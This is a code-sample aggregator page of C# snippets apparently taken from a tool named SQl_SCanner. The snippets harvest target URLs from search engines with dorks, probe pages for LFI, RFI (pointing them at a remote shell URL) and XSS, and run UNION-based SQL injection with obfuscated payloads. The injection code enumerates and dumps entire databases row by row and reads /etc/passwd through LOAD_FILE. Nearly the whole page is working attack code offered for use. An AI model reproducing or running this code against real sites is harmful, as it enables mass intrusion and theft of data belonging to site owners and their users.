HttpRequete, SQl_SCanner C# (CSharp)のコード例

コード例 #1

0

ファイルを表示

        // ?    ===> %3F
        public void Yandex(string[] DorkArray, string maxpage)
        {//http://www.yandex.com/yandsearch?text=shop.php%3fsubcat_id%3d
            int         compteur;
            int         nbrdork = DorkArray.Length;
            int         max     = Convert.ToInt16(maxpage + 0);
            HttpRequete hr      = new HttpRequete();
            Extracteur  ext     = new Extracteur();

            hr.get("https://www.yandex.com/yandsearch");
            for (int i = 0; i < nbrdork; i++)                  //Pour Dork
            {
                for (compteur = 0; compteur < max; compteur++) //Pour Page a faire
                {
                    string url  = "http://www.yandex.com/yandsearch?text=" + HttpUtility.UrlEncode(DorkArray[i]) + "&p=" + compteur;
                    string page = hr.get(url);
                    if (!page.Contains("search requests sent from your IP"))
                    {
                        ext.Yandex(page);
                    }
                    else
                    {
                        break;
                    }
                    form.UpInfos();
                }
            }
        }

コード例 #2

0

ファイルを表示

        public bool Lfi(string link)
        {
            HttpRequete hr = new HttpRequete();
            bool        bl = false;

            try
            {
                for (int i = 0; (i <= (link.Split(delimeteur).Length - 1)); i++)
                {
                    string v = (link.Split(delimeteur)[i].Trim().Split('=')[0] + "=../");
                    if (v.Contains("="))
                    {
                        string Source = hr.get(v);
                        if (Source.Contains("No such file or directory"))
                        {
                            bl = true;
                        }
                        else
                        {
                            bl = false;
                        }
                    }
                }
                return(bl);
            }
            catch (Exception)
            {
                return(false);
            }
        }

コード例 #3

0

ファイルを表示

        public bool setInfos()
        {
            HttpRequete hr    = new HttpRequete();
            Outils      oo    = new Outils();
            string      url_g = _url_point.Replace(var_n, "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")");
            string      page  = hr.get(url_g);

            if (page.Contains(separateur))
            {
                string[] rslt = ch.extSubResult(s_separateur, ch.extResult(separateur, page));
                string   ip   = oo.avoirip(_url_point.Split('/')[2]);
                setBD(rslt[2]);
                form_principale.groupBox4.Invoke((MethodInvoker)(() =>
                {
                    form_principale.txt_user.Text = rslt[0];
                    form_principale.txt_version.Text = rslt[1];
                    form_principale.txt_ipserveur.Text = ip;
                }));
                return(true);
            }
            else
            {
                return(false);
            }
        }

コード例 #4

0

ファイルを表示

        public void Google(string[] DorkArray, string maxpage)
        {
            int         compteur;
            int         nbrdork = DorkArray.Length;
            int         max     = Convert.ToInt16(maxpage + 0);
            HttpRequete hr      = new HttpRequete();
            Extracteur  ext     = new Extracteur();

            for (int i = 0; i < nbrdork; i++)
            {
                for (compteur = 0; compteur < max; compteur += 10)
                {
                    string url  = "https://www.google.com/search?q=" + HttpUtility.UrlEncode(DorkArray[i]) + "&start=" + compteur;
                    string page = hr.get(url);
                    if ((!page.Contains("CAPTCHA")) || (!page.Contains(form.monip)))
                    {
                        ext.Google(page);
                    }
                    else
                    {
                    }
                    form.UpInfos();
                }
            }
        }

コード例 #5

0

ファイルを表示

        private bool Rfi(string link, string SHELL_URL)
        {
            HttpRequete hr = new HttpRequete();

            try
            {
                bool bl = false;
                for (int i = 0; (i <= (link.Split(delimeteur).Length - 1)); i++)
                {
                    string v = (link.Split(delimeteur)[i].Trim().Split('=')[0] + ("="
                                                                                  + (SHELL_URL + "?")));
                    if (v.Contains("="))
                    {
                        string Source = hr.get(v);
                        if ((Source.Contains("RFI_SUCCESSFUL") &&
                             (!Source.Contains("$invulnerable") &&
                              (Source.Length > 20))))
                        {
                            bl = true;
                        }
                        else
                        {
                            bl = false;
                        }
                    }
                }
                return(bl);
            }
            catch (Exception)
            {
                return(false);
            }
        }

コード例 #6

0

ファイルを表示

        private int getNombreDB()
        {
            HttpRequete hr    = new HttpRequete();
            string      inj   = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
            string      url_f = _url_point.Replace(var_n, inj);
            string      page  = hr.get(url_f);

            return(Convert.ToInt32(ch.extResult(separateur, page)));
        }

コード例 #7

0

ファイルを表示

        private int getNombreDonne(string db_name, string tb_name)
        {
            HttpRequete hr    = new HttpRequete();
            string      inj   = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from " + db_name + "." + tb_name + ")";
            string      url_f = _url_point.Replace(var_n, inj);
            string      page  = hr.get(url_f);

            return(Convert.ToInt32(ch.extResult(separateur, page)));
        }

コード例 #8

0

ファイルを表示

        private int getNombreColonne(string db_name, string tb_name)
        {///**/sElEcT /**/cOnCaT(0x217e21,count(0),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61)
            HttpRequete hr    = new HttpRequete();
            string      inj   = "(select concat(" + ch.getHex(separateur) + ",count(0)," + ch.getHex(separateur) + ") from information_schema.sChEmAtA where not sChEmA_NaMe=" + ch.getHex("information_schema") + ")";
            string      url_f = _url_point.Replace(var_n, inj);
            string      page  = hr.get(url_f);

            return(Convert.ToInt32(ch.extResult(separateur, page)));
        }

コード例 #9

0

ファイルを表示

        /*
         * //EXCEPTION
         *  http://www.eatmybrains.com/showreview.php?id=999999.9 union all select [t],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
         *
         *
         */
        public void Analyse(string url)
        {
            form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
            {
                form.txt_statut_analyse.Text = "Analyse: " + url + Environment.NewLine;
            }));
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                bool[] ok = new bool[2];
                ok[0] = vrf.demmareAnalyseFast(url);
                ok[1] = vrf.demmareAnalyseAvanced(url);
                if (ok[0] || ok[1])
                {
                    int u = 0; //Union Style 1
                    while (!point_trv && u < _union.Count)
                    {
                        _nbr_colonne = colonne.Compter(_param, _url_base, _union[u]);
                        onFait((u + 1).ToString());
                        for (int p = 0; p < _param.Count; p++)
                        {
                            _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                            url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _union[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                            inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                            string page = hr.get(inj_point_curr);
                            if (page.Contains(separateur) || page.Contains(s_separateur))
                            {
                                setResult(page, url_inj_point);
                                point_trv = true;
                                break;
                            }
                        }
                        u++;
                    }
                }
                else
                {
                    form.txt_statut_analyse.Invoke((MethodInvoker)(() =>
                    {
                        form.txt_statut_analyse.Text = "Injection char echouer :( ";
                    }));
                }
            }
        }

コード例 #10

0

ファイルを表示

        internal void setTable(string[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc     = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                int      indexDB = -1;
                form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                {
                    try
                    {
                        indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Clear();
                    }
                    catch (Exception) { }
                }));

                int nbr = 0;
                try { nbr = getNombreTable(mrc[0]); }
                catch { }
                //(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/tAbLe_nAmE),0x217e21) /**/fRoM information_schema./**/tAbLeS /**/wHeRe /**/tAbLe_sChEmA=0x6d6f64656c73686f5f6462)
                HttpRequete hr = new HttpRequete();
                //Methode 1
                //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(table_name)," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(db_name) + ")";
                //Methode 2 //unhex(Hex(cast(group_concat(table_name) as char)))
                string inj       = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(table_name) as char)))," + ch.getHex(separateur) + ") from information_schema.tables where table_schema=" + ch.getHex(mrc[0]) + ")";
                string url_f     = _url_point.Replace(var_n, (inj));
                string page      = hr.get(url_f);
                string tablebrut = ch.extResult(separateur, page);

                string[] tables = tablebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                foreach (string table in tables)
                {
                    if (!string.IsNullOrEmpty(table))
                    {
                        string table_name = ch.regexHtmlScape(table);
                        try
                        {
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.BeginUpdate();
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.Add(table_name);
                                form_principale.tree_schema_dmp.Nodes[indexDB].Expand();
                                form_principale.tree_schema_dmp.EndUpdate();
                            }));
                        }
                        catch { }
                    }
                }
            }
        }

コード例 #11

0

ファイルを表示

        internal string[] getInfos(string url_point)
        {
            HttpRequete hr    = new HttpRequete();
            string      url_g = url_point.Replace(var_n, "concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")");
            string      page  = hr.get(url_g);

            if (page.Contains(separateur))
            {
                string[] rslt = ch.extSubResult(s_separateur, ch.extResult(separateur, page));
                return(rslt);
            }
            string[] vide = { "", "", "", "" };
            return(vide);
        }

コード例 #12

0

ファイルを表示

        internal void setColonne(String[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                if (mrc.Length > 1)
                {
                    int indexDB    = -1;
                    int indexTable = -1;
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        indexDB = form_principale.tree_schema_dmp.Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[0])).Index;
                        indexTable = form_principale.tree_schema_dmp.Nodes[indexDB].Nodes.OfType <TreeNode>().FirstOrDefault(node => node.Text.Equals(mrc[1])).Index;
                        form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Clear();
                    }));


                    int nbr = 0;
                    try { nbr = getNombreColonne(mrc[0], mrc[1]); }
                    catch { }
                    HttpRequete hr = new HttpRequete();
                    //Methode 0
                    //string inj = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(column_name)," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(db_name) + " and table_name=" + ch.getHex(table_name) + ")";
                    //Methode 1 //unhex(Hex(cast(group_concat(table_name) as char)))
                    string inj         = "(select distinct concat(" + ch.getHex(separateur) + ",unhex(Hex(cast(group_concat(column_name) as char)))," + ch.getHex(separateur) + ") from information_schema.columns where table_schema=" + ch.getHex(mrc[0]) + " and table_name=" + ch.getHex(mrc[1]) + ")";
                    string url_f       = _url_point.Replace(var_n, ch.Encode(inj));
                    string page        = hr.get(url_f);
                    string colonnebrut = ch.extResult(separateur, page);

                    string[] colonnes = colonnebrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                    foreach (string colonne in colonnes)
                    {
                        if (!string.IsNullOrEmpty(colonne))
                        {
                            string colonne_name = ch.regexHtmlScape(colonne);
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Nodes.Add(colonne_name);
                                form_principale.tree_schema_dmp.Nodes[indexDB].Nodes[indexTable].Expand();
                            }));
                        }
                    }
                }
            }
        }

コード例 #13

0

ファイルを表示

        public void Bing(string[] DorkArray, string maxpage)
        {
            int         compteur;
            int         nbrdork = DorkArray.Length;
            int         max     = Convert.ToInt16(maxpage + 0);
            HttpRequete hr      = new HttpRequete();
            Extracteur  ext     = new Extracteur();

            for (int i = 0; i < nbrdork; i++)                      //Pour Dork
            {
                for (compteur = 0; compteur < max; compteur += 15) //Pour Page a faire
                {
                    string url  = "http://bing.com/search?q=" + HttpUtility.UrlEncode(DorkArray[i]) + "&first=" + compteur;
                    string page = hr.get(url);
                    ext.Bing(page);
                    form.UpInfos();
                }
            }
        }

コード例 #14

0

ファイルを表示

        public void Yahoo(string[] DorkArray, string maxpage)
        {
            int         compteur;
            int         nbrdork = DorkArray.Length;
            int         max     = Convert.ToInt16(maxpage + 0);
            HttpRequete hr      = new HttpRequete();
            Extracteur  ext     = new Extracteur();

            for (int i = 0; i < nbrdork; i++)                      //Pour Dork
            {
                for (compteur = 1; compteur < max; compteur += 10) //Pour Page a faire
                {
                    string url  = "http://search.yahoo.com/search?n=100&p=" + HttpUtility.UrlEncode(DorkArray[i]) + "&pstart=1&b=" + compteur;
                    string page = hr.get(url);
                    ext.Yahoo(page);
                    form.UpInfos();
                }
            }
        }

コード例 #15

0

ファイルを表示

        internal void setAllBD()
        {
            HttpRequete hr  = new HttpRequete();
            int         nbr = 0;

            try { nbr = getNombreDB(); }
            catch { }//(/**/sElEcT /**/dIsTiNcT /**/cOnCaT(0x217e21,/**/gRoUp_cOnCaT(/**/sChEmA_NaMe),0x217e21) /**/fRoM information_schema./**/sChEmAtA /**/wHeRe not /**/sChEmA_NaMe=0x696e666f726d6174696f6e5f736368656d61)
            string inj    = "(select distinct concat(" + ch.getHex(separateur) + ",group_concat(schema_name)," + ch.getHex(separateur) + ") from information_schema.schemata where not schema_name=" + ch.getHex("information_schema") + ")";
            string url_f  = _url_point.Replace(var_n, ch.Encode(inj));
            string page   = hr.get(url_f);
            string dbbrut = ch.extResult(separateur, page);

            if (dbbrut != string.Empty)
            {
                if (nbr > 1)
                {
                    string[] basededonnes = dbbrut.Split(new char[] { ',' }, StringSplitOptions.RemoveEmptyEntries);
                    foreach (string bd in basededonnes)
                    {
                        if (!string.IsNullOrEmpty(bd))
                        {
                            string   bd_name = ch.regexHtmlScape(bd);
                            TreeNode treeBD  = new TreeNode(bd_name);
                            form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.tree_schema_dmp.BeginUpdate();
                                form_principale.tree_schema_dmp.Nodes.Add(treeBD);
                                form_principale.tree_schema_dmp.EndUpdate();
                            }));
                        }
                    }
                }
                else
                {
                    TreeNode treeBD = new TreeNode(dbbrut);
                    form_principale.tree_schema_dmp.Invoke((MethodInvoker)(() =>
                    {
                        form_principale.tree_schema_dmp.Nodes.Add(treeBD);
                    }));
                }
            }
        }

コード例 #16

0

ファイルを表示

 public bool demmareAnalyseFast(string url)
 {
     checked
     {
         string      url_racine = url.Split('?')[0];
         HttpRequete hr         = new HttpRequete();
         chaine      ch         = new chaine();
         _param = ch.analyseParam(url);
         for (int i = 0; i < _param.Count; i++)
         {
             string url_c = url_racine + ch.genParamParIndex(_param, 0, i + 1) + sqli + ch.genParamParIndex(_param, i + 1, _param.Count);
             string page  = hr.get(url_c);
             if (verifPage(page))
             {
                 return(true);
             }
         }
         return(false);
     }
 }

コード例 #17

0

ファイルを表示

        public bool Xss(string url)
        {
            HttpRequete hr = new HttpRequete();
            bool        bl = false;

            for (int i = 0; (i <= (url.Split(delimeteur).Length - 1)); i++)
            {
                string page = hr.get((url.Split(delimeteur)[i].Trim().Split('=')[i] + ('=' + ('"' + "><script>alert(\'XSS_SUCCESSFUL\')</script>"))));
                if ((page.Contains("<script>alert(\'XSS_SUCCESSFUL\')</script>") &&
                     !page.Contains("You have an error in your SQL syntax")))
                {
                    bl = true;
                }
                else
                {
                    bl = false;
                }
            }
            return(bl);
        }

コード例 #18

0

ファイルを表示

        internal void Aol(string[] DorkArray, string maxpage)
        {
            int         compteur;
            int         nbrdork = DorkArray.Length;
            int         max     = Convert.ToInt16(maxpage + 0);
            HttpRequete hr      = new HttpRequete();
            Extracteur  ext     = new Extracteur();

            hr.get("http://search.aol.com/aol/webhome");
            for (int i = 0; i < nbrdork; i++)                  //Pour Dork
            {
                for (compteur = 0; compteur < max; compteur++) //Pour Page a faire //http://search.aol.com/aol/search?q=
                {
                    string url  = "http://search.aol.com/aol/search?q=" + DorkArray[i] + "&page=" + compteur;
                    string page = hr.get(url);
                    ext.Aol(page);
                    form.UpInfos();
                }
            }
        }

コード例 #19

0

ファイルを表示

        internal bool checkLoadFile(string url_point, string fichier = "/etc/passwd")
        {
            HttpRequete hr    = new HttpRequete();
            Outils      oo    = new Outils();
            string      url_g = url_point.Replace(var_n, "cOnVeRt(/**/cOnCaT(" + ch.getHex(separateur) + "/**/hEx(/**/lOaD_FiLe(" + ch.getHex(fichier) + "))," + ch.getHex(separateur) + ") using utf8)");
            string      page  = hr.get(url_g);

            if (page.Contains(separateur))
            {
                string result = ch.extResult(separateur, page);
                if (result != "")
                {
                    return(true);
                }
                else
                {
                    return(false);
                }
            }
            return(false);
        }

コード例 #20

0

ファイルを表示

        internal void setDonne(String[] chemin_node)
        {
            foreach (string item in chemin_node)
            {
                string[] mrc = item.Split(new char[] { '\\' }, StringSplitOptions.RemoveEmptyEntries);
                if (mrc.Length > 2)
                {
                    int nbr_row = 0;
                    nbr_row = getNombreDonne(mrc[0], mrc[1]);
                    HttpRequete hr      = new HttpRequete();
                    string[]    colonne = mrc[2].Split(new string[] { "[-COL]" }, StringSplitOptions.RemoveEmptyEntries);
                    form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
                    {
                        foreach (string element in colonne)
                        {
                            if (element != string.Empty)
                            {
                                form_principale.dataGridView_dumper.Columns.Add(element, element);
                            }
                        }
                    }));
                    for (int d = 0; d < nbr_row; d++)
                    {
                        string inj   = "(select concat(" + BuildQuery(s_separateur, colonne) + ") from " + mrc[0] + "." + mrc[1] + " limit " + d + ",1)";
                        string url_f = _url_point.Replace(var_n, inj);
                        string page  = hr.get(url_f);

                        string   donnebrut    = ch.extResult(separateur, page);
                        string[] resultLignes = donnebrut.Split(new string[] { s_separateur }, StringSplitOptions.None);
                        if (checkAllEmpty(resultLignes))
                        {
                            form_principale.dataGridView_dumper.Invoke((MethodInvoker)(() =>
                            {
                                form_principale.dataGridView_dumper.Rows.Add(resultLignes);
                            }));
                        }
                    }
                }
            }
        }

コード例 #21

0

ファイルを表示

        public bool demmareAnalyseAvanced(string url)
        {
            checked
            {
                string      url_racine = url.Split('?')[0];
                HttpRequete hr         = new HttpRequete();
                chaine      ch         = new chaine();
                _param = ch.analyseParam(url);

                string param_curr = baseI.Replace(var_n, baseF.Replace(var_n, ch.getHex(separateur) + "," + ch.getHex(testSTR) + "," + ch.getHex(separateur)));

                for (int i = 0; i < _param.Count; i++)
                {
                    string url_c = url_racine + ch.ViderDernierParam(ch.genParamParIndex(_param, 0, i + 1)) + ch.Encode(param_curr) + ch.genParamParIndex(_param, i + 1, _param.Count);
                    string page  = hr.get(url_c);
                    if (verifPageAdvenced(page))
                    {
                        return(true);
                    }
                }
                return(false);
            }
        }

コード例 #22

0

ファイルを表示

        public int FindColonneVise(string url, int maxColonne)
        {
            HttpRequete  hr          = new HttpRequete();
            const string okstr       = "QUADCOREENGINE666";                       //51554144434f5245454e47494e45363636
            string       chkstr      = "concat(0x217e21," + var_n + ",0x217e21)"; //concat(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)
            string       url_f       = string.Empty;
            string       _url_base   = url.Split('?')[0];
            string       _url_params = "?" + url.Split('?')[1];

            for (int i = 1; i <= maxColonne + 1; i++)
            {
                string param = ch.Encode(chkstr.Replace(var_n, ch.getHex(okstr)));
                var    regex = new Regex(Regex.Escape(i.ToString()));
                url_f = _url_base + regex.Replace(_url_params, param, 1);
                string page = hr.get(url_f);
                if (page.Contains(okstr))
                {
                    return(i);
                }
            }
            //MessageBox.Show(url_f);
            return(-1);
        }

コード例 #23

0

ファイルを表示

 public int Compter(List <string> param, string url_base, string union)
 {
     checked
     {
         HttpRequete hr = new HttpRequete();
         for (int p = 0; p < param.Count; p++)
         {
             for (int i = 0; i <= 60; i++)
             {
                 string url_curr = url_base +
                                   ch.ViderDernierParam(ch.genParamParIndex(param, 0, (p + 1))) +
                                   ch.Encode(union.Replace(var_n, GenSynHex(i))) +
                                   ch.genParamParIndex(param, p + 1, param.Count);
                 string page = hr.get(url_curr);
                 if (page.Contains(syntax_count))
                 {
                     return(i);
                 }
             }
         }
         return(0);
     }
 }

コード例 #24

0

ファイルを表示

        public bool WebDav_Scanner(string url)
        {
            HttpRequete hr = new HttpRequete();

            try
            {
                string urltrv = ("http://" + (url + "/webdav/"));

                string str = hr.get(urltrv);
                if (str.Contains("WebDAV testpage"))
                {
                    return(true);
                }
                else
                {
                    return(false);
                }
            }
            catch (Exception)
            {
                return(false);
            }
        }

コード例 #25

0

ファイルを表示

        public string Analyse(string url)
        {
            checked
            {
                HttpRequete  hr             = new HttpRequete();
                sqli_check   vrf            = new sqli_check();
                sqli_colonne colonne        = new sqli_colonne();
                string       url_inj_point  = string.Empty;
                string       inj_point_curr = string.Empty;
                bool         point_trv      = false;
                _url_originale = url;
                _url_base      = url.Split('?')[0];
                _param         = ch.analyseParam(url);

                int u = 0; //Union Style 1
                while (!point_trv && u < _unionStyle.Count)
                {
                    _nbr_colonne = colonne.Compter(_param, _url_base, _unionStyle[u]);
                    for (int p = 0; p < _param.Count; p++)
                    {
                        _colonne_point = colonne.FindColonneVise(_url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count), _nbr_colonne);

                        url_inj_point = _url_base + ch.escapeParam(ch.genParamParIndex(_param, 0, p + 1)) + _unionStyle[u].Replace("[t]", ch.genNbrColonneVise(_nbr_colonne, _colonne_point)) + ch.genParamParIndex(_param, p + 1, _param.Count);

                        inj_point_curr = url_inj_point.Replace("[t]", ch.Encode("concat(" + ch.getHex(separateur) + ",concat(user()," + ch.getHex(s_separateur) + ",version()," + ch.getHex(s_separateur) + ",database())," + ch.getHex(separateur) + ")"));

                        string page = hr.get(inj_point_curr);
                        if (page.Contains(separateur) || page.Contains(s_separateur))
                        {
                            return(url_inj_point);
                        }
                    }
                    u++;
                }
                return("False");
            }
        }

C# (CSharp) SQl_SCanner HttpRequeteの例